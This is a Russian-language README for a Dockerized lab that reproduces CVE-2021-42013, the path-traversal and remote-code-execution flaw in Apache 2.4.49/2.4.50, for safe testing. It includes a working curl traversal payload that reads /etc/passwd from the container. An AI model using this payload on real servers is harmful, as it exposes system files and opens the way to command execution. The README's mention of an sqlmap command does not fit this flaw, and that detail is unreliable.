
CVE: 2021-42013 Протестировано на: 2.4.49 и 2.4.50 Описание: Уязвимости обхода пути (Path Traversal) или удалённого выполнения кода (Remote Code Execution) в Apache 2.4.49 и 2.4.50
Этот проект направлен на докеризацию конкретной уязвимости с помощью Docker. Цель — создать изолированную среду, в которой уязвимость можно безопасно эксплуатировать и тестировать.
Apache HTTP Server 2.4.50 - удалённое выполнение кода && обход пути
Для запуска этого проекта на вашей машине должны быть установлены:
После установки необходимых компонентов вы можете склонировать этот Git-репозиторий на свою машину:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
Находясь в каталоге, выполните команду ниже, чтобы развернуть уязвимую среду:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
Затем перейдите к приложению по адресу http://localhost:8000 Если всё прошло успешно, вы должны увидеть сообщение "It works"
Выполнение этого payload с помощью curl, приведённого ниже, показывает, что цель уязвима. Скрипт сгенерирует соответствующую команду sqlmap для эксплуатации уязвимости
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
Этот payload позволяет напрямую получать информацию о пользователе в системе без согласия пользователя.
После активации модулей cgi или cgid на сервере данная уязвимость позволит атакующему выполнять произвольные команды